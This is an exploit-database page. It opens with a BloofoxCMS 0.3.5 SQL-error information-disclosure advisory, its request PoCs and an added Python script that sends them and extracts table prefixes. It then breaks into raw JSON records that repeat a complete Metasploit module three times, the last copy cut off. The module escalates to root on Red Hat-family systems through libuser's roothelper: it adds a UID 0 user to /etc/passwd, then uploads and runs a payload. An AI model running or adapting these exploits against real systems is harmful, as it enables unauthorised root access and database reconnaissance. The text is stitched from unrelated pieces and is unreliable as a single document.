BloofoxCMS v0.3.5 Information Disclosure Vulnerabilities
2010-10-28T00:00:00
ID 1337DAY-ID-14609 Type zdt Reporter High-Tech Bridge Modified 2010-10-28T00:00:00
Description
Exploit for php platform in category web applications
========================================================
BloofoxCMS v0.3.5 Information Disclosure Vulnerabilities
========================================================
Reference: http://www.htbridge.ch/advisory/information_disclosure_in_bloofoxcms_1.html
Product: BloofoxCMS
Vendor: bloofox.com ( http://bloofox.com/ )
Vulnerable Version: 0.3.5 and probably prior versions
Vendor Notification: 13 October 2010
Vulnerability Type: Information Disclosure
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Low
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
Vulnerability Details:
The "/index.php" script does not properly sanitize the user-supplied "username" parameter before placing it in an SQL query. A value that breaks the quoted string literal makes the query fail, and the resulting SQL error message is returned to the client, revealing the database table prefix.
The following PoC is available:
<form action="http://[host]/index.php?login=true" method="post">
<input name="username" type="hidden" value="\\">
<input name="password" type="hidden" value="password">
<input value="Login" name="login" type="submit">
</form>
Vulnerability Details:
The "/index.php" script likewise does not properly sanitize the user-supplied "key" parameter before placing it in an SQL query. A value that breaks the quoted string literal makes the query fail, and the resulting SQL error message is returned to the client, revealing the database table prefix.
The following PoC is available:
http://[host]/index.php?key=\\
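As an added example (not code from the advisory or from bloofox), the following Python script covers both PoCs above: it builds the two requests exactly as printed, shows why an unescaped backslash leaves a single-quoted MySQL literal unterminated, and scans a response for database error text that echoes a table name. The query shape in naive_query(), the table prefix cms_ and SAMPLE_ERROR_PAGE are constructed for illustration; the real bloofox queries and prefix are not on this page. The payload is taken as printed on the page (two backslash characters); how many backslashes actually reach the query depends on any escaping layer in front of it (for example magic_quotes_gpc in PHP of that era), which the advisory does not describe, so the scanner judges the response rather than assuming a particular query.

```python
"""Added example for the BloofoxCMS 0.3.5 information disclosure PoCs.
Not part of the High-Tech Bridge advisory or of bloofox. Standard library only;
nothing is sent over the network unless send_poc() is called explicitly."""
import re
import urllib.error
import urllib.request
from typing import List, Tuple
from urllib.parse import quote, urlencode

# Payload as printed in the advisory's PoC: two backslash characters.
POC_VALUE = "\\\\"


def build_poc_requests(host: str) -> List[Tuple[str, str, str]]:
    """Return the two PoC requests as (method, url, body), mirroring the advisory."""
    base = f"http://{host}/index.php"
    login_body = urlencode({"username": POC_VALUE, "password": "password", "login": "Login"})
    return [
        ("POST", base + "?login=true", login_body),
        ("GET", base + "?key=" + quote(POC_VALUE, safe=""), ""),
    ]


def naive_query(username: str) -> str:
    """Hypothetical string-interpolated query (the vulnerable pattern, not bloofox's code)."""
    return f"SELECT * FROM cms_users WHERE username='{username}'"


def quoted_literal_terminated(sql: str) -> bool:
    """Scan the first single-quoted literal under MySQL's default escaping rules
    (backslash escapes the next character, '' is a doubled quote).
    A lone trailing backslash swallows the closing quote, so the literal never ends
    and the server raises a syntax error."""
    i = sql.index("'") + 1
    while i < len(sql):
        c = sql[i]
        if c == "\\":
            i += 2          # escaped character, skip it
            continue
        if c == "'":
            if i + 1 < len(sql) and sql[i + 1] == "'":
                i += 2      # doubled quote inside the literal
                continue
            return True     # closing quote found
        i += 1
    return False


# Constructed sample of a PHP page that leaks the failing query; not captured from a real install.
SAMPLE_ERROR_PAGE = (
    "<b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid "
    "MySQL result resource in <b>/var/www/index.php</b> on line <b>42</b><br />\n"
    "You have an error in your SQL syntax; check the manual that corresponds to "
    "your MySQL server version for the right syntax to use near '\\'' at line 1<br />\n"
    "Query: SELECT * FROM cms_users WHERE username='\\' AND password='...'\n"
)

MYSQL_ERROR_MARKERS = (
    "You have an error in your SQL syntax",
    "supplied argument is not a valid MySQL result",
    "doesn't exist",
)
# Table names following FROM/JOIN/INTO/UPDATE in an echoed query, or in a
# "Table 'db.name' doesn't exist" message; the prefix is everything up to the first underscore.
TABLE_REF = re.compile(r"\b(?:FROM|JOIN|INTO|UPDATE)\s+`?(?:\w+`?\.`?)?(\w+?_)\w+", re.I)
TABLE_MSG = re.compile(r"Table '(?:\w+\.)?(\w+?_)\w+' doesn't exist")


def looks_like_mysql_error(body: str) -> bool:
    return any(marker in body for marker in MYSQL_ERROR_MARKERS)


def extract_table_prefixes(body: str) -> List[str]:
    """Heuristic: collect table prefixes visible in MySQL error text."""
    return sorted(set(TABLE_REF.findall(body)) | set(TABLE_MSG.findall(body)))


def send_poc(host: str, timeout: float = 10.0) -> List[Tuple[str, bool, List[str]]]:
    """Send both PoC requests and report (url, error_seen, prefixes) for each."""
    results = []
    for method, url, body in build_poc_requests(host):
        data = body.encode() if method == "POST" else None
        req = urllib.request.Request(url, data=data, method=method)
        if data is not None:
            req.add_header("Content-Type", "application/x-www-form-urlencoded")
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                page = resp.read().decode("utf-8", "replace")
        except urllib.error.HTTPError as exc:   # a 500 page may still carry the error text
            page = exc.read().decode("utf-8", "replace")
        results.append((url, looks_like_mysql_error(page), extract_table_prefixes(page)))
    return results
```

send_poc(host) performs live requests; run it only against systems you are authorized to test. The regexes are heuristics for MySQL-style error text and for PHP pages that echo the failing query, which is the usual way the prefix leaks. The durable fix on the application side is parameterized queries plus returning a generic error to the client while logging the database error server-side.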
# 0day.today [2018-01-05] #
Tags: Metasploit Framework (MSF), Local", "modified": "2018-05-16T00:00:00", "published": "2018-05-16T00:00:00", "id": "EDB-ID:44633", "href": "https://www.exploit-db.com/exploits/44633/", "type": "exploitdb", "title": "Libuser - 'roothelper' Privilege Escalation (Metasploit)", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = GreatRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Post::Linux::Priv\r\n include Msf::Post::Linux::System\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Libuser roothelper Privilege Escalation',\r\n 'Description' => %q{\r\n This module attempts to gain root privileges on Red Hat based Linux\r\n systems, including RHEL, Fedora and CentOS, by exploiting a newline\r\n injection vulnerability in libuser and userhelper versions prior to\r\n 0.56.13-8 and version 0.60 before 0.60-7.\r\n\r\n This module makes use of the roothelper.c exploit from Qualys to\r\n insert a new user with UID=0 in /etc/passwd.\r\n\r\n Note, the password for the current user is required by userhelper.\r\n\r\n Note, on some systems, such as Fedora 11, the user entry for the\r\n current user in /etc/passwd will become corrupted and exploitation\r\n will fail.\r\n\r\n This module has been tested successfully on libuser packaged versions\r\n 0.56.13-4.el6 on CentOS 6.0 (x86_64);\r\n 0.56.13-5.el6 on CentOS 6.5 (x86_64);\r\n 0.60-5.el7 on CentOS 7.1-1503 (x86_64);\r\n 0.56.16-1.fc13 on Fedora 13 (i686);\r\n 0.59-1.fc19 on Fedora Desktop 19 (x86_64);\r\n 0.60-3.fc20 on Fedora Desktop 20 (x86_64);\r\n 0.60-6.fc21 on Fedora Desktop 21 (x86_64);\r\n 0.60-6.fc22 on Fedora Desktop 22 (x86_64);\r\n 0.56.13-5.el6 on Red Hat 6.6 (x86_64); and\r\n 0.60-5.el7 on Red Hat 7.0 (x86_64).\r\n\r\n RHEL 5 is 
vulnerable, however the installed version of glibc (2.5)\r\n is missing various functions required by roothelper.c.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Qualys', # Discovery and C exploit\r\n 'Brendan Coles' # Metasploit\r\n ],\r\n 'DisclosureDate' => 'Jul 24 2015',\r\n 'Platform' => [ 'linux' ],\r\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\r\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\r\n 'Targets' => [[ 'Auto', {} ]],\r\n 'Privileged' => true,\r\n 'References' =>\r\n [\r\n [ 'AKA', 'roothelper.c' ],\r\n [ 'EDB', '37706' ],\r\n [ 'CVE', '2015-3245' ],\r\n [ 'CVE', '2015-3246' ],\r\n [ 'BID', '76021' ],\r\n [ 'BID', '76022' ],\r\n [ 'URL', 'http://seclists.org/oss-sec/2015/q3/185' ],\r\n [ 'URL', 'https://access.redhat.com/articles/1537873' ]\r\n ],\r\n 'DefaultTarget' => 0))\r\n register_options [\r\n OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]),\r\n OptString.new('PASSWORD', [ true, 'Password for the current user', '' ]),\r\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])\r\n ]\r\n end\r\n\r\n def base_dir\r\n datastore['WritableDir'].to_s\r\n end\r\n\r\n def password\r\n datastore['PASSWORD'].to_s\r\n end\r\n\r\n def upload(path, data)\r\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\r\n rm_f path\r\n write_file path, data\r\n register_file_for_cleanup path\r\n end\r\n\r\n def upload_and_chmodx(path, data)\r\n upload path, data\r\n cmd_exec \"chmod +x '#{path}'\"\r\n end\r\n\r\n def live_compile?\r\n compile = false\r\n\r\n if datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')\r\n if has_gcc?\r\n vprint_good 'gcc is installed'\r\n compile = true\r\n else\r\n unless datastore['COMPILE'].eql? 'Auto'\r\n fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'\r\n end\r\n end\r\n end\r\n\r\n compile\r\n end\r\n\r\n def check\r\n userhelper_path = '/usr/sbin/userhelper'\r\n unless setuid? 
userhelper_path\r\n vprint_error \"#{userhelper_path} is not setuid\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"#{userhelper_path} is setuid\"\r\n\r\n unless command_exists? 'script'\r\n vprint_error \"script is not installed. Exploitation will fail.\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good 'script is installed'\r\n\r\n if cmd_exec('lsattr /etc/passwd').include? 'i'\r\n vprint_error 'File /etc/passwd is immutable'\r\n return CheckCode::Safe\r\n end\r\n vprint_good 'File /etc/passwd is not immutable'\r\n\r\n glibc_banner = cmd_exec 'ldd --version'\r\n glibc_version = Gem::Version.new glibc_banner.scan(/^ldd\\s+\\(.*\\)\\s+([\\d\\.]+)/).flatten.first\r\n if glibc_version.to_s.eql? ''\r\n vprint_error 'Could not determine the GNU C library version'\r\n return CheckCode::Detected\r\n end\r\n\r\n # roothelper.c requires functions only available since glibc 2.6+\r\n if glibc_version < Gem::Version.new('2.6')\r\n vprint_error \"GNU C Library version #{glibc_version} is not supported\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"GNU C Library version #{glibc_version} is supported\"\r\n\r\n CheckCode::Detected\r\n end\r\n\r\n def exploit\r\n if check == CheckCode::Safe\r\n fail_with Failure::NotVulnerable, 'Target is not vulnerable'\r\n end\r\n\r\n if is_root?\r\n fail_with Failure::BadConfig, 'Session already has root privileges'\r\n end\r\n\r\n unless cmd_exec(\"test -w '#{base_dir}' && echo true\").include? 
'true'\r\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\r\n end\r\n\r\n executable_name = \".#{rand_text_alphanumeric rand(5..10)}\"\r\n executable_path = \"#{base_dir}/#{executable_name}\"\r\n\r\n if live_compile?\r\n vprint_status 'Live compiling exploit on system...'\r\n\r\n # Upload Qualys' roothelper.c exploit:\r\n # - https://www.exploit-db.com/exploits/37706/\r\n path = ::File.join Msf::Config.data_directory, 'exploits', 'roothelper', 'roothelper.c'\r\n fd = ::File.open path, 'rb'\r\n c_code = fd.read fd.stat.size\r\n fd.close\r\n upload \"#{executable_path}.c\", c_code\r\n output = cmd_exec \"gcc -o #{executable_path} #{executable_path}.c\"\r\n\r\n unless output.blank?\r\n print_error output\r\n fail_with Failure::Unknown, \"#{executable_path}.c failed to compile\"\r\n end\r\n\r\n cmd_exec \"chmod +x #{executable_path}\"\r\n register_file_for_cleanup executable_path\r\n else\r\n vprint_status 'Dropping pre-compiled exploit on system...'\r\n\r\n # Cross-compiled with:\r\n # - i486-linux-musl-gcc -o roothelper -static -pie roothelper.c\r\n path = ::File.join Msf::Config.data_directory, 'exploits', 'roothelper', 'roothelper'\r\n fd = ::File.open path, 'rb'\r\n executable_data = fd.read fd.stat.size\r\n fd.close\r\n upload_and_chmodx executable_path, executable_data\r\n end\r\n\r\n # Run roothelper\r\n timeout = 180\r\n print_status \"Launching roothelper exploit (Timeout: #{timeout})...\"\r\n output = cmd_exec \"echo #{password.gsub(/'/, \"\\\\\\\\'\")} | #{executable_path}\", nil, timeout\r\n output.each_line { |line| vprint_status line.chomp }\r\n\r\n if output =~ %r{Creating a backup copy of \"/etc/passwd\" named \"(.*)\"}\r\n register_file_for_cleanup $1\r\n end\r\n\r\n if output =~ /died in parent: .*.c:517: forkstop_userhelper/\r\n fail_with Failure::NoAccess, 'Incorrect password'\r\n end\r\n\r\n @username = nil\r\n\r\n if output =~ /Exploit successful, run \"su ([a-z])\" to become root/\r\n @username = $1\r\n end\r\n\r\n if 
@username.blank?\r\n fail_with Failure::Unknown, 'Something went wrong'\r\n end\r\n\r\n print_good \"Success! User '#{@username}' added to /etc/passwd\"\r\n\r\n # Upload payload executable\r\n payload_path = \"#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}\"\r\n upload_and_chmodx payload_path, generate_payload_exe\r\n\r\n # Execute payload executable\r\n vprint_status 'Executing payload...'\r\n cmd_exec \"script -c \\\"su - #{@username} -c #{payload_path}\\\" | sh & echo \"\r\n register_file_for_cleanup 'typescript'\r\n end\r\n\r\n #\r\n # Remove new user from /etc/passwd\r\n #\r\n def on_new_session(session)\r\n new_user_removed = false\r\n\r\n if session.type.to_s.eql? 'meterpreter'\r\n session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'\r\n\r\n # Remove new user\r\n session.sys.process.execute '/bin/sh', \"-c \\\"sed -i 's/^#{@username}:.*$//g' /etc/passwd\\\"\"\r\n\r\n # Wait for clean up\r\n Rex.sleep 5\r\n\r\n # Check for new user in /etc/passwd\r\n passwd_contents = session.fs.file.open('/etc/passwd').read.to_s\r\n unless passwd_contents =~ /^#{@username}:/\r\n new_user_removed = true\r\n end\r\n elsif session.type.to_s.eql? 
'shell'\r\n # Remove new user\r\n session.shell_command_token \"sed -i 's/^#{@username}:.*$//g' /etc/passwd\"\r\n\r\n # Check for new user in /etc/passwd\r\n passwd_user = session.shell_command_token \"grep '#{@username}:' /etc/passwd\"\r\n unless passwd_user =~ /^#{@username}:/\r\n new_user_removed = true\r\n end\r\n end\r\n\r\n unless new_user_removed\r\n print_warning \"Could not remove user '#{@username}' from /etc/passwd\"\r\n end\r\n rescue => e\r\n print_error \"Error during cleanup: #{e.message}\"\r\n ensure\r\n super\r\n end\r\nend", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/44633/"}], "zdt": [{"lastseen": "2018-05-15T23:55:45", "bulletinFamily": "exploit", "description": "This Metasploit module attempts to gain root privileges on Red Hat based Linux systems, including RHEL, Fedora and CentOS, by exploiting a newline injection vulnerability in libuser and userhelper versions prior to 0.56.13-8 and version 0.60 before 0.60-7. This Metasploit module makes use of the roothelper.c exploit from Qualys to insert a new user with UID=0 in /etc/passwd. Note, the password for the current user is required by userhelper. Note, on some systems, such as Fedora 11, the user entry for the current user in /etc/passwd will become corrupted and exploitation will fail. This Metasploit module has been tested successfully on libuser packaged versions 0.56.13-4.el6 on CentOS 6.0 (x86_64); 0.56.13-5.el6 on CentOS 6.5 (x86_64); 0.60-5.el7 on CentOS 7.1-1503 (x86_64); 0.56.16-1.fc13 on Fedora 13 (i686); 0.59-1.fc19 on Fedora Desktop 19 (x86_64); 0.60-3.fc20 on Fedora Desktop 20 (x86_64); 0.60-6.fc21 on Fedora Desktop 21 (x86_64); 0.60-6.fc22 on Fedora Desktop 22 (x86_64); 0.56.13-5.el6 on Red Hat 6.6 (x86_64); and 0.60-5.el7 on Red Hat 7.0 (x86_64). 
RHEL 5 is vulnerable, however the installed version of glibc (2.5) is missing various functions required by roothelper.c.", "modified": "2018-05-15T00:00:00", "published": "2018-05-15T00:00:00", "id": "1337DAY-ID-30355", "href": "https://0day.today/exploit/description/30355", "title": "Libuser roothelper Privilege Escalation Exploit", "type": "zdt", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = GreatRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Post::Linux::Priv\r\n include Msf::Post::Linux::System\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Libuser roothelper Privilege Escalation',\r\n 'Description' => %q{\r\n This module attempts to gain root privileges on Red Hat based Linux\r\n systems, including RHEL, Fedora and CentOS, by exploiting a newline\r\n injection vulnerability in libuser and userhelper versions prior to\r\n 0.56.13-8 and version 0.60 before 0.60-7.\r\n\r\n This module makes use of the roothelper.c exploit from Qualys to\r\n insert a new user with UID=0 in /etc/passwd.\r\n\r\n Note, the password for the current user is required by userhelper.\r\n\r\n Note, on some systems, such as Fedora 11, the user entry for the\r\n current user in /etc/passwd will become corrupted and exploitation\r\n will fail.\r\n\r\n This module has been tested successfully on libuser packaged versions\r\n 0.56.13-4.el6 on CentOS 6.0 (x86_64);\r\n 0.56.13-5.el6 on CentOS 6.5 (x86_64);\r\n 0.60-5.el7 on CentOS 7.1-1503 (x86_64);\r\n 0.56.16-1.fc13 on Fedora 13 (i686);\r\n 0.59-1.fc19 on Fedora Desktop 19 (x86_64);\r\n 0.60-3.fc20 on Fedora Desktop 20 (x86_64);\r\n 0.60-6.fc21 on Fedora Desktop 21 (x86_64);\r\n 0.60-6.fc22 on Fedora Desktop 22 (x86_64);\r\n 0.56.13-5.el6 on Red Hat 6.6 
(x86_64); and\r\n 0.60-5.el7 on Red Hat 7.0 (x86_64).\r\n\r\n RHEL 5 is vulnerable, however the installed version of glibc (2.5)\r\n is missing various functions required by roothelper.c.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Qualys', # Discovery and C exploit\r\n 'Brendan Coles' # Metasploit\r\n ],\r\n 'DisclosureDate' => 'Jul 24 2015',\r\n 'Platform' => [ 'linux' ],\r\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\r\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\r\n 'Targets' => [[ 'Auto', {} ]],\r\n 'Privileged' => true,\r\n 'References' =>\r\n [\r\n [ 'AKA', 'roothelper.c' ],\r\n [ 'EDB', '37706' ],\r\n [ 'CVE', '2015-3245' ],\r\n [ 'CVE', '2015-3246' ],\r\n [ 'BID', '76021' ],\r\n [ 'BID', '76022' ],\r\n [ 'URL', 'http://seclists.org/oss-sec/2015/q3/185' ],\r\n [ 'URL', 'https://access.redhat.com/articles/1537873' ]\r\n ],\r\n 'DefaultTarget' => 0))\r\n register_options [\r\n OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]),\r\n OptString.new('PASSWORD', [ true, 'Password for the current user', '' ]),\r\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])\r\n ]\r\n end\r\n\r\n def base_dir\r\n datastore['WritableDir'].to_s\r\n end\r\n\r\n def password\r\n datastore['PASSWORD'].to_s\r\n end\r\n\r\n def upload(path, data)\r\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\r\n rm_f path\r\n write_file path, data\r\n register_file_for_cleanup path\r\n end\r\n\r\n def upload_and_chmodx(path, data)\r\n upload path, data\r\n cmd_exec \"chmod +x '#{path}'\"\r\n end\r\n\r\n def live_compile?\r\n compile = false\r\n\r\n if datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')\r\n if has_gcc?\r\n vprint_good 'gcc is installed'\r\n compile = true\r\n else\r\n unless datastore['COMPILE'].eql? 'Auto'\r\n fail_with Failure::BadConfig, 'gcc is not installed. 
Compiling will fail.'\r\n end\r\n end\r\n end\r\n\r\n compile\r\n end\r\n\r\n def check\r\n userhelper_path = '/usr/sbin/userhelper'\r\n unless setuid? userhelper_path\r\n vprint_error \"#{userhelper_path} is not setuid\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"#{userhelper_path} is setuid\"\r\n\r\n unless command_exists? 'script'\r\n vprint_error \"script is not installed. Exploitation will fail.\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good 'script is installed'\r\n\r\n if cmd_exec('lsattr /etc/passwd').include? 'i'\r\n vprint_error 'File /etc/passwd is immutable'\r\n return CheckCode::Safe\r\n end\r\n vprint_good 'File /etc/passwd is not immutable'\r\n\r\n glibc_banner = cmd_exec 'ldd --version'\r\n glibc_version = Gem::Version.new glibc_banner.scan(/^ldd\\s+\\(.*\\)\\s+([\\d\\.]+)/).flatten.first\r\n if glibc_version.to_s.eql? ''\r\n vprint_error 'Could not determine the GNU C library version'\r\n return CheckCode::Detected\r\n end\r\n\r\n # roothelper.c requires functions only available since glibc 2.6+\r\n if glibc_version < Gem::Version.new('2.6')\r\n vprint_error \"GNU C Library version #{glibc_version} is not supported\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"GNU C Library version #{glibc_version} is supported\"\r\n\r\n CheckCode::Detected\r\n end\r\n\r\n def exploit\r\n if check == CheckCode::Safe\r\n fail_with Failure::NotVulnerable, 'Target is not vulnerable'\r\n end\r\n\r\n if is_root?\r\n fail_with Failure::BadConfig, 'Session already has root privileges'\r\n end\r\n\r\n unless cmd_exec(\"test -w '#{base_dir}' && echo true\").include? 
'true'\r\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\r\n end\r\n\r\n executable_name = \".#{rand_text_alphanumeric rand(5..10)}\"\r\n executable_path = \"#{base_dir}/#{executable_name}\"\r\n\r\n if live_compile?\r\n vprint_status 'Live compiling exploit on system...'\r\n\r\n # Upload Qualys' roothelper.c exploit:\r\n # - https://www.exploit-db.com/exploits/37706/\r\n path = ::File.join Msf::Config.data_directory, 'exploits', 'roothelper', 'roothelper.c'\r\n fd = ::File.open path, 'rb'\r\n c_code = fd.read fd.stat.size\r\n fd.close\r\n upload \"#{executable_path}.c\", c_code\r\n output = cmd_exec \"gcc -o #{executable_path} #{executable_path}.c\"\r\n\r\n unless output.blank?\r\n print_error output\r\n fail_with Failure::Unknown, \"#{executable_path}.c failed to compile\"\r\n end\r\n\r\n cmd_exec \"chmod +x #{executable_path}\"\r\n register_file_for_cleanup executable_path\r\n else\r\n vprint_status 'Dropping pre-compiled exploit on system...'\r\n\r\n # Cross-compiled with:\r\n # - i486-linux-musl-gcc -o roothelper -static -pie roothelper.c\r\n path = ::File.join Msf::Config.data_directory, 'exploits', 'roothelper', 'roothelper'\r\n fd = ::File.open path, 'rb'\r\n executable_data = fd.read fd.stat.size\r\n fd.close\r\n upload_and_chmodx executable_path, executable_data\r\n end\r\n\r\n # Run roothelper\r\n timeout = 180\r\n print_status \"Launching roothelper exploit (Timeout: #{timeout})...\"\r\n output = cmd_exec \"echo #{password.gsub(/'/, \"\\\\\\\\'\")} | #{executable_path}\", nil, timeout\r\n output.each_line { |line| vprint_status line.chomp }\r\n\r\n if output =~ %r{Creating a backup copy of \"/etc/passwd\" named \"(.*)\"}\r\n register_file_for_cleanup $1\r\n end\r\n\r\n if output =~ /died in parent: .*.c:517: forkstop_userhelper/\r\n fail_with Failure::NoAccess, 'Incorrect password'\r\n end\r\n\r\n @username = nil\r\n\r\n if output =~ /Exploit successful, run \"su ([a-z])\" to become root/\r\n @username = $1\r\n end\r\n\r\n if 
@username.blank?\r\n fail_with Failure::Unknown, 'Something went wrong'\r\n end\r\n\r\n print_good \"Success! User '#{@username}' added to /etc/passwd\"\r\n\r\n # Upload payload executable\r\n payload_path = \"#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}\"\r\n upload_and_chmodx payload_path, generate_payload_exe\r\n\r\n # Execute payload executable\r\n vprint_status 'Executing payload...'\r\n cmd_exec \"script -c \\\"su - #{@username} -c #{payload_path}\\\" | sh & echo \"\r\n register_file_for_cleanup 'typescript'\r\n end\r\n\r\n #\r\n # Remove new user from /etc/passwd\r\n #\r\n def on_new_session(session)\r\n new_user_removed = false\r\n\r\n if session.type.to_s.eql? 'meterpreter'\r\n session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'\r\n\r\n # Remove new user\r\n session.sys.process.execute '/bin/sh', \"-c \\\"sed -i 's/^#{@username}:.*$//g' /etc/passwd\\\"\"\r\n\r\n # Wait for clean up\r\n Rex.sleep 5\r\n\r\n # Check for new user in /etc/passwd\r\n passwd_contents = session.fs.file.open('/etc/passwd').read.to_s\r\n unless passwd_contents =~ /^#{@username}:/\r\n new_user_removed = true\r\n end\r\n elsif session.type.to_s.eql? 
'shell'\r\n # Remove new user\r\n session.shell_command_token \"sed -i 's/^#{@username}:.*$//g' /etc/passwd\"\r\n\r\n # Check for new user in /etc/passwd\r\n passwd_user = session.shell_command_token \"grep '#{@username}:' /etc/passwd\"\r\n unless passwd_user =~ /^#{@username}:/\r\n new_user_removed = true\r\n end\r\n end\r\n\r\n unless new_user_removed\r\n print_warning \"Could not remove user '#{@username}' from /etc/passwd\"\r\n end\r\n rescue => e\r\n print_error \"Error during cleanup: #{e.message}\"\r\n ensure\r\n super\r\n end\r\nend\n\n# 0day.today [2018-05-15] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/30355"}], "packetstorm": [{"lastseen": "2018-05-14T01:10:49", "bulletinFamily": "exploit", "description": "", "modified": "2018-05-13T00:00:00", "published": "2018-05-13T00:00:00", "id": "PACKETSTORM:147599", "href": "https://packetstormsecurity.com/files/147599/Libuser-roothelper-Privilege-Escalation.html", "title": "Libuser roothelper Privilege Escalation", "type": "packetstorm", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = GreatRanking \n \ninclude Msf::Post::File \ninclude Msf::Post::Linux::Priv \ninclude Msf::Post::Linux::System \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Libuser roothelper Privilege Escalation', \n'Description' => %q{ \nThis module attempts to gain root privileges on Red Hat based Linux \nsystems, including RHEL, Fedora and CentOS, by exploiting a newline \ninjection vulnerability in libuser and userhelper versions prior to \n0.56.13-8 and version 0.60 before 0.60-7. 
\n \nThis module makes use of the roothelper.c exploit from Qualys to \ninsert a new user with UID=0 in /etc/passwd. \n \nNote, the password for the current user is required by userhelper. \n \nNote, on some systems, such as Fedora 11, the user entry for the \ncurrent user in /etc/passwd will become corrupted and exploitation \nwill fail. \n \nThis module has been tested successfully on libuser packaged versions \n0.56.13-4.el6 on CentOS 6.0 (x86_64); \n0.56.13-5.el6 on CentOS 6.5 (x86_64); \n0.60-5.el7 on CentOS 7.1-1503 (x86_64); \n0.56.16-1.fc13 on Fedora 13 (i686); \n0.59-1.fc19 on Fedora Desktop 19 (x86_64); \n0.60-3.fc20 on Fedora Desktop 20 (x86_64); \n0.60-6.fc21 on Fedora Desktop 21 (x86_64); \n0.60-6.fc22 on Fedora Desktop 22 (x86_64); \n0.56.13-5.el6 on Red Hat 6.6 (x86_64); and \n0.60-5.el7 on Red Hat 7.0 (x86_64). \n \nRHEL 5 is vulnerable, however the installed version of glibc (2.5) \nis missing various functions required by roothelper.c. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Qualys', # Discovery and C exploit \n'Brendan Coles' # Metasploit \n], \n'DisclosureDate' => 'Jul 24 2015', \n'Platform' => [ 'linux' ], \n'Arch' => [ ARCH_X86, ARCH_X64 ], \n'SessionTypes' => [ 'shell', 'meterpreter' ], \n'Targets' => [[ 'Auto', {} ]], \n'Privileged' => true, \n'References' => \n[ \n[ 'AKA', 'roothelper.c' ], \n[ 'EDB', '37706' ], \n[ 'CVE', '2015-3245' ], \n[ 'CVE', '2015-3246' ], \n[ 'BID', '76021' ], \n[ 'BID', '76022' ], \n[ 'URL', 'http://seclists.org/oss-sec/2015/q3/185' ], \n[ 'URL', 'https://access.redhat.com/articles/1537873' ] \n], \n'DefaultTarget' => 0)) \nregister_options [ \nOptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]), \nOptString.new('PASSWORD', [ true, 'Password for the current user', '' ]), \nOptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) \n] \nend \n \ndef base_dir \ndatastore['WritableDir'].to_s \nend \n \ndef password \ndatastore['PASSWORD'].to_s 
